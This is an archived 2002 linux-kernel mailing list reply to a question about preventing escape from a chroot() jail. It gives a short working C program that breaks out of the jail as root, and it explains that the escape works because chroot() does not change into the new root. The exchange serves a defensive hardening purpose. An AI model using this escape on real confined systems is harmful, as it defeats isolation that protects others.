Re: prevent breaking a chroot() jail?

Miquel van Smoorenburg (miquels@cistron.nl)
Fri, 5 Jul 2002 14:02:58 +0000 (UTC)

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Thunder from the hill: "Re: IBM Desktar disk problem?"
Previous message: Gerhard Mack: "Re: your mail"
Maybe in reply to: Shaya Potter: "prevent breaking a chroot() jail?"
Next in thread: Thunder from the hill: "Re: prevent breaking a chroot() jail?"

In article <1025877004.11004.59.camel@zaphod>,
Shaya Potter <spotter@cs.columbia.edu> wrote:
>I'm trying to develop a way to ensure that one can't break out of a
>chroot() jail, even as root. I'm willing to change the way the syscalls
>work (most likely only for a subset of processes, i.e. processes that
>are run in the jail end up getting a marker which is passed down to all
>their children that causes the syscalls to behave differently).
>What should I be aware of? I figure devices (no need to run mknod in
>this jail) and chroot (as per man page), is there any other way of
>breaking the chroot jail (at a syscall level or otherwise)?

int main()
{
chdir("/");
mkdir("foo");
chroot("foo");
chdir("../../../../../../..");
chroot(".");
execl("/bin/sh", "sh", NULL);
}

Run as root and you're out of the chroot jail. This is because
chroot() doesn't chdir() to the new root, so after a chroot() in
the chroot jail you're suddenly out of it.

Mike.

-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at http://vger.kernel.org/majordomo-info.html
Please read the FAQ at http://www.tux.org/lkml/

Next message: Thunder from the hill: "Re: IBM Desktar disk problem?"
Previous message: Gerhard Mack: "Re: your mail"
Maybe in reply to: Shaya Potter: "prevent breaking a chroot() jail?"
Next in thread: Thunder from the hill: "Re: prevent breaking a chroot() jail?"